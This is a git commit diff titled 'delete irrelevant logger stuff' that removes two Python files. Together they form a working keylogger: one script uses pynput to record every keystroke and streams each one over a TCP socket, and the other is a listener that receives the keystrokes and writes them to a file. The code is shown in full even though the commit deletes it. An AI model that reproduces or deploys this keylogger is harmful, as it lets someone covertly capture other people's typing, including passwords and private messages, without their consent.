delete irrelevant logger stuff

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Daniel 2021-04-19 14:47:02 +01:00
parent 815061e2f0
commit 945a496016
2 changed files with 0 additions and 150 deletions

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import socket
import os
# device's IP address
SERVER_HOST = "127.0.0.1" #(socket.gethostbyname(socket.gethostname()))
SERVER_PORT = 5001
# receive 4096 bytes each time
BUFFER_SIZE = 128
SEPARATOR = "<SEPARATOR>"
# create the server socket
# TCP socket
s = socket.socket()
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# accept connection if there is any
client_socket, address = s.accept()
# if below code is executed, that means the sender is connected
print(f"[+] {address} is connected.")
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
# start receiving the file from the socket
# and writing to the file stream
#with open(filename, "wb") as f:
while True:
# read 1024 bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done take another time
break
# write to the file the bytes we just received
f = open(filename, 'ab')
if (bytes_read.find("Key") == -1): #don't write shifts and controls
f.write(bytes_read)
print(bytes_read)
f.close()
# close the client socket
#client_socket.close()
# close the server socket
#s.close()

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import socket
import os
from pynput import keyboard
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 128 # send 4096 bytes each time step
# the ip address or hostname of the server, the receiver
host = "127.0.0.1"
# the port, let's use 5001
port = 5001
# the name of file we want to send, make sure it exists
filename = "data.txt"
# get the file size
filesize = os.path.getsize("data.txt")
# create the client socket
s = socket.socket()
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
def sendfile():
# start sending the file
with open(filename, "rb") as f:
while True:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to assure transimission in
# busy networks
s.sendall(bytes_read)
# close the socket
#s.close()
#-----------------------------------------------------------
def on_press(key):
if str(key) == 'Key.enter':
text_file = open("data.txt", "w")
text_file.write("\n")
text_file.close()
sendfile()
elif str(key) == 'Key.space':
text_file = open("data.txt", "w")
text_file.write(" ")
text_file.close()
sendfile()
elif str(key) == 'Key.backspace':
print("Invalid")
else:
text_file = open("data.txt", "w")
text_file.write(('{}'.format(key)).replace("'", ""))
text_file.close()
sendfile()
def on_release(key):
#print('Key {} released.'.format(key))
if str(key) == 'Key.esc':
print('Exiting...')
return False
with keyboard.Listener(
on_press = on_press,
on_release = on_release) as listener:
listener.join()
#-----------------------------------------